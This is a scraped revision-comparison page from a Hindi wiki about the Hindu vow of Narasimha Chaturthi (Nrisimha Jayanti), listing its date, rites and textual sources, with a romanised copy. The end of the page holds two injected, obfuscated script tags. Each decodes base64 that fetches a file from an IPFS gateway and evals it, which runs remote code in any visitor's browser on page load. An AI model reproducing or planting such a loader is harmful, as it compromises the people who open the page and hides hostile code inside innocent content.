Difference between revisions of "नरसिंह चतुर्थी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[वैशाख]] [[शुक्ल पक्ष]] की चतुर्दशी को यह व्रत किया जाता है।
 
*[[वैशाख]] [[शुक्ल पक्ष]] की चतुर्दशी को यह व्रत किया जाता है।
 
*यदि [[स्वाति नक्षत्र]] हो, शनिवार हो, सिद्धि योग एवं वणिज करण हो तो करोड़ गुना पुण्य होता है।
 
*यदि [[स्वाति नक्षत्र]] हो, शनिवार हो, सिद्धि योग एवं वणिज करण हो तो करोड़ गुना पुण्य होता है।
 
*नरसिंह (अवतार) देवता की पूजा की जाती है।<ref>हेमाद्रि (व्रतखण्ड 2|14-49, नरसिंह पुराण से उद्धरण); पुरुषार्थचिन्तामणि (237-238); समयमयूख (98),</ref>  
 
*नरसिंह (अवतार) देवता की पूजा की जाती है।<ref>हेमाद्रि (व्रतखण्ड 2|14-49, नरसिंह पुराण से उद्धरण); पुरुषार्थचिन्तामणि (237-238); समयमयूख (98),</ref>  
*पुरुषचिन्तामणि आदि ने इसे [[नृसिंह जयन्ती]] कहा है।<ref>स्मृतिकौस्तुभ (114)</ref>  
+
*पुरुषचिन्तामणि आदि ने इसे [[नृसिंह जयन्ती]] कहा है।<ref>स्मृतिकौस्तुभ (114</ref>  
 
*यदि यह 13 या 15वीं से युक्त हो तब वह दिन जब 14वीं तिथि सूर्यास्त के समय उपस्थित हो तो उसे स्वीकार कर लेना चाहिए।  
 
*यदि यह 13 या 15वीं से युक्त हो तब वह दिन जब 14वीं तिथि सूर्यास्त के समय उपस्थित हो तो उसे स्वीकार कर लेना चाहिए।  
*वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी (पृ0 145-152)</ref> ने पूजा की एक लम्बी विधि दी है।
+
*वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी (पृ0 145-152</ref> ने पूजा की एक लम्बी विधि दी है।
 
*यह तमिल पांचांगों में भी पायी जाती है।  
 
*यह तमिल पांचांगों में भी पायी जाती है।  
 
*नृसिंह भगवान् वैशाख शुक्ल की चतुर्दशी को स्वाति नक्षत्र में प्रकट हुए थे।  
 
*नृसिंह भगवान् वैशाख शुक्ल की चतुर्दशी को स्वाति नक्षत्र में प्रकट हुए थे।  
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:51, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vaishakh shukl paksh ki chaturdashi ko yah vrat kiya jata hai.
  • yadi svati nakshatr ho, shanivar ho, siddhi yog evan vanij karan ho to karo d guna puny hota hai.
  • narasianh (avatar) devata ki pooja ki jati hai.[1]
  • purushachintamani adi ne ise nrisianh jayanti kaha hai.[2]
  • yadi yah 13 ya 15vian se yukt ho tab vah din jab 14vian tithi sooryast ke samay upasthit ho to use svikar kar lena chahie.
  • varshakriyakaumudi[3] ne pooja ki ek lambi vidhi di hai.
  • yah tamil paanchaangoan mean bhi payi jati hai.
  • nrisianh bhagavanh vaishakh shukl ki chaturdashi ko svati nakshatr mean prakat hue the.


tika tippani aur sandarbh

  1. hemadri (vratakhand 2|14-49, narasianh puran se uddharan); purusharthachintamani (237-238); samayamayookh (98),
  2. smritikaustubh (114
  3. varshakriyakaumudi (pri0 145-152

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>